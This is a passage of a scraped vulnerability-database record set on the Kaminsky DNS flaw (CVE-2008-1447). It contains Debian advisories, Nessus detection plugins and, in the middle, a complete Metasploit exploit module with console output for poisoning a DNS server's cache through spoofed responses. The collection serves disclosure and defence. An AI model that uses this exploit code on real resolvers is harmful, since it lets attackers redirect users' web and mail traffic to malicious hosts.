Scott\r\nKitterman noted that python-dns is vulnerable to this predictability,\r\nas it randomizes neither its transaction ID nor its source port.\r\nTaken together, this lack of entropy leaves applications using\r\npython-dns to perform DNS queries highly susceptible to response\r\nforgery.\r\n\r\nThe Common Vulnerabilities and Exposures project identifies this\r\nclass of weakness as CVE-2008-1447.\r\n\r\nFor the stable distribution (etch), these problems have been fixed in\r\nversion 2.3.0-5.2+etch1.\r\n\r\nWe recommend that you upgrade your python-dns package.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0.orig.tar.gz\r\n Size/MD5 checksum: 21084 82d377c6a59181072b30b0da4e9835b8\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.diff.gz\r\n Size/MD5 checksum: 3444 06a021e1cf9836cec4bbe72461bab137\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.dsc\r\n Size/MD5 checksum: 695 c2e7178128b7033952b7795b358dea0b\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1_all.deb\r\n Size/MD5 checksum: 22750 
b544ce3edb7d2051811ec743a49206a1\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFIjEBMU5XKDemr/NIRAtOoAJ91jGx81nu4sscNxN4kh/sK6n+IAACgsw9F\r\ntkZYVyRx5dD7xQk0AKMYM4Q=\r\n=2uYK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-29T00:00:00", "published": "2008-07-29T00:00:00", "id": "SECURITYVULNS:DOC:20231", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20231", "title": "[SECURITY] [DSA 1619-1] New python-dns packages fix DNS response spoofing", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": " ____ ____ __ __\r\n / \ / \ | | | |\r\n ----====####/ /\__\##/ /\ \##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\ \/ /#| |##| |#| |##| |######======------\r\n \____/ |__| |__| \______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) 
metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | (_) |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|\r\n| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_\r\n|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary(bailiwicked_host) > show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server's source query port (0 for automatic)\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\n\r\nmsf auxiliary(bailiwicked_host) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 
48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary(bailiwicked_host) > set SRCPORT 0\r\nSRCPORT => 0\r\n\r\nmsf auxiliary(bailiwicked_host) > run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. 
into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(bailiwicked_host) > \r\n\r\nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary\r\n\r\n include Exploit::Remote::Ip\r\n\r\n def initialize(info = {})\r\n super(update_info(info, \r\n 'Name' => 'DNS BailiWicked Host Attack',\r\n 'Description' => %q{\r\n This exploit attacks a fairly ubiquitous flaw in DNS implementations\r\nwhich \r\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a\r\nsingle\r\n malicious host entry into the target nameserver by sending random\r\nsub-domain\r\n queries to the target DNS server coupled with spoofed replies to those\r\n queries from the authoritative nameservers for the domain which\r\ncontain a\r\n malicious host entry for the hostname to be poisoned in the authority\r\nand\r\n additional records sections. 
Eventually, a guessed ID will match and\r\nthe\r\n spoofed packet will get accepted, and due to the additional hostname\r\nentry\r\n being within bailiwick constraints of the original request the\r\nmalicious host\r\n entry will get cached.\r\n },\r\n 'Author' => [ 'I)ruid', 'hdm' ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 5585 $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2008-1447' ],\r\n [ 'US-CERT-VU', '800113' ],\r\n [ 'URL',\r\n'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => \r\n [\r\n ["BIND", \r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Jul 21 2008'\r\n ))\r\n \r\n register_options(\r\n [\r\n OptPort.new('SRCPORT', [true, "The target server's source\r\nquery port (0 for automatic)", nil]),\r\n OptString.new('HOSTNAME', [true, 'Hostname to hijack',\r\n'pwned.example.com']),\r\n OptAddress.new('NEWADDR', [true, 'New address for hostname',\r\n'1.3.3.7']),\r\n OptAddress.new('RECONS', [true, 'Nameserver used for\r\nreconnaissance', '208.67.222.222']),\r\n OptInt.new('XIDS', [true, 'Number of XIDs to try for each\r\nquery', 10]),\r\n OptInt.new('TTL', [true, 'TTL for the malicious host entry',\r\n31337]),\r\n ], self.class)\r\n \r\n end\r\n \r\n def auxiliary_commands\r\n return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n end\r\n\r\n def cmd_check(*args)\r\n targ = args[0] || rhost()\r\n if(not (targ and targ.length > 0))\r\n print_status("usage: check [dns-server]")\r\n return\r\n end\r\n\r\n print_status("Using the Metasploit service to verify exploitability...")\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => targ,\r\n 'PeerPort' => 53\r\n ) \r\n\r\n random = false\r\n ports = []\r\n lport = nil\r\n \r\n 1.upto(5) do |i|\r\n \r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, 
Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n\r\n if res and res.length > 0\r\n res = Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n\r\n print_status(" >> ADDRESS: #{t_addr} PORT:\r\n#{t_port}")\r\n t_port = t_port.to_i\r\n if(lport and lport != t_port)\r\n random = true\r\n end\r\n lport = t_port\r\n ports << t_port\r\n end\r\n end\r\n end \r\n end\r\n \r\n srv_sock.close\r\n \r\n if(ports.length < 5)\r\n print_status("UNKNOWN: This server did not reply to our vulnerability check\r\nrequests")\r\n return\r\n end\r\n \r\n if(random)\r\n print_status("PASS: This server does not use a static source port. Ports:\r\n#{ports.join(", ")}")\r\n print_status(" This server may still be exploitable, but not by this\r\ntool.")\r\n else\r\n print_status("FAIL: This server uses static source ports and is vulnerable to\r\npoisoning")\r\n end\r\n end\r\n \r\n def run\r\n target = rhost()\r\n source = Rex::Socket.source_address(target)\r\n sport = datastore['SRCPORT']\r\n hostname = datastore['HOSTNAME'] + '.'\r\n address = datastore['NEWADDR']\r\n recons = datastore['RECONS']\r\n xids = datastore['XIDS'].to_i\r\n ttl = datastore['TTL'].to_i\r\n xidbase = rand(4)+2*10000\r\n\r\n domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]\r\n\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => target,\r\n 'PeerPort' => 53\r\n )\r\n\r\n # Get the source port via the metasploit service if it's not set\r\n if sport.to_i == 0\r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n if res and res.length > 0\r\n res = 
Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n sport = t_port.to_i\r\n\r\n print_status("Switching to target port #{sport} based\r\non Metasploit service")\r\n if target != t_addr\r\n print_status("Warning: target address\r\n#{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n end\r\n end\r\n end\r\n end\r\n end\r\n\r\n # Verify its not already cached\r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n\r\n begin\r\n cached = false\r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n t = Time.now + ttl\r\n print_status("Failure: This hostname is\r\nalready in the target cache: #{name} == #{address}")\r\n print_status(" Cache entry expires on\r\n#{t.to_s}... 
sleeping.")\r\n cached = true\r\n sleep ttl\r\n end\r\n end\r\n end\r\n end until not cached\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n end\r\n\r\n res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false,\r\n:recursive => true) # reconnaissance resolver\r\n\r\n print_status "Targeting nameserver #{target} for injection of #{hostname} as\r\n#{address}"\r\n\r\n # Look up the nameservers for the domain\r\n print_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n answer0 = res0.send(domain, Net::DNS::NS)\r\n #print_status " Got answer with #{answer0.header.anCount} answers,\r\n#{answer0.header.nsCount} authorities"\r\n\r\n barbs = [] # storage for nameservers\r\n answer0.answer.each do |rr0|\r\n print_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n if rr0.type == 'NS'\r\n print_status " Querying recon nameserver for address of\r\n#{rr0.nsdname}..."\r\n answer1 = res0.send(rr0.nsdname) # get the ns's answer for the\r\nhostname\r\n #print_status " Got answer with #{answer1.header.anCount} answers,\r\n#{answer1.header.nsCount} authorities"\r\n answer1.answer.each do |rr1|\r\n print_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n res2 = Net::DNS::Resolver.new(:nameservers => rr1.address,\r\n:dns_search => false, :recursive => false, :retry => 1) \r\n print_status " Checking Authoritativeness: Querying\r\n#{rr1.address} for #{domain}..."\r\n answer2 = res2.send(domain)\r\n if answer2 and answer2.header.auth? 
and\r\nanswer2.header.anCount >= 1\r\n nsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n barbs << nsrec\r\n print_status " #{rr0.nsdname} is authoritative for\r\n#{domain}, adding to list of nameservers to spoof as"\r\n end\r\n end\r\n end \r\n end\r\n\r\n if barbs.length == 0\r\n print_status( "No DNS servers found.")\r\n srv_sock.close\r\n disconnect_ip\r\n return\r\n end\r\n\r\n # Flood the target with queries and spoofed responses, one will eventually hit\r\n queries = 0\r\n responses = 0\r\n\r\n connect_ip if not ip_sock\r\n\r\n print_status( "Attempting to inject a poison record for #{hostname} into\r\n#{target}:#{sport}...")\r\n\r\n while true\r\n randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize\r\nthe hostname\r\n\r\n # Send spoofed query\r\n req = Resolv::DNS::Message.new\r\n req.id = rand(2**16)\r\n req.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n req.rd = 1\r\n\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[0][:addr].to_s,\r\n :src => source,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => (rand((2**16)-1024)+1024).to_i,\r\n :dport => 53\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n queries += 1\r\n \r\n # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.add_authority(domain, ttl,\r\nResolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\r\n req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.qr = 1\r\n req.ra = 1\r\n\r\n xidbase.upto(xidbase+xids-1) do |id|\r\n req.id = id\r\n barbs.each do |barb|\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[i][:addr].to_s,\r\n :src => barb[:addr].to_s,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => 53,\r\n :dport => sport.to_i\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n responses += 1\r\n end\r\n end\r\n\r\n # status 
update\r\n if queries % 1000 == 0\r\n print_status("Sent #{queries} queries and #{responses} spoofed\r\nresponses...")\r\n end\r\n\r\n # every so often, check and see if the target is poisoned...\r\n if queries % 250 == 0 \r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n \r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n print_status("Poisoning successful\r\nafter #{queries} attempts: #{name} == #{address}")\r\n disconnect_ip\r\n return\r\n end\r\n end\r\n end\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error querying the DNS name: #{e.class} #{e}\r\n#{e.backtrace}")\r\n end\r\n end\r\n\r\n end\r\n\r\n end\r\n\r\nend\r\nend\r\n\r\n\r\n-- \r\nI)ruid, C²ISSP\r\ndruid@caughq.org\r\nhttp://druid.caughq.org", "edition": 1, "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SECURITYVULNS:DOC:20222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20222", "title": "CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : 
remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resolver on the host, possibly in\r\nforward-only mode. BIND 9 will then use source port randomization\r\nwhen sending queries over the network. (Other caching resolvers can\r\nbe used instead.)\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks (both from internal and external sources).\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz\r\nKiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm\r\naa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ\r\nVaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c\r\nmYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ\r\nhr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw==\r\n=CMHb\r\n-----END PGP SIGNATURE-----", "edition": 1, 
"modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:24", "description": "The remote host is affected by the vulnerability described in GLSA-200809-02\n(dnsmasq: Denial of Service and DNS spoofing)\n\n Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP\n source ports when forwarding DNS queries to a recursing DNS server\n (CVE-2008-1447).\n Carlos Carvalho reported that dnsmasq in the 2.43 version does not\n properly handle clients sending inform or renewal queries for unknown\n DHCP leases, leading to a crash (CVE-2008-3350).\n \nImpact :\n\n A remote attacker could send spoofed DNS response traffic to dnsmasq,\n possibly involving generating queries via multiple vectors, and spoof\n DNS replies, which could e.g. lead to the redirection of web or mail\n traffic to malicious sites. 
Furthermore, an attacker could generate\n invalid DHCP traffic and cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2008-09-05T00:00:00", "title": "GLSA-200809-02 : dnsmasq: Denial of Service and DNS spoofing", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "modified": "2008-09-05T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:dnsmasq"], "id": "GENTOO_GLSA-200809-02.NASL", "href": "https://www.tenable.com/plugins/nessus/34091", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200809-02.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34091);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1447\", \"CVE-2008-3350\");\n script_xref(name:\"GLSA\", value:\"200809-02\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-200809-02 : dnsmasq: Denial of Service and DNS spoofing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200809-02\n(dnsmasq: Denial of Service and DNS spoofing)\n\n Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP\n source ports when forwarding DNS queries to a 
recursing DNS server\n (CVE-2008-1447).\n Carlos Carvalho reported that dnsmasq in the 2.43 version does not\n properly handle clients sending inform or renewal queries for unknown\n DHCP leases, leading to a crash (CVE-2008-3350).\n \nImpact :\n\n A remote attacker could send spoofed DNS response traffic to dnsmasq,\n possibly involving generating queries via multiple vectors, and spoof\n DNS replies, which could e.g. lead to the redirection of web or mail\n traffic to malicious sites. Furthermore, an attacker could generate\n invalid DHCP traffic and cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200809-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All dnsmasq users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/dnsmasq-2.45'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/05\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/dnsmasq\", unaffected:make_list(\"ge 2.45\"), vulnerable:make_list(\"lt 2.45\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T02:03:29", "description": "The remote host is running dnsmasq, a DHCP and DNS server.\n\nThe version of dnsmasq installed on the remote host reports itself as\n2.43. 
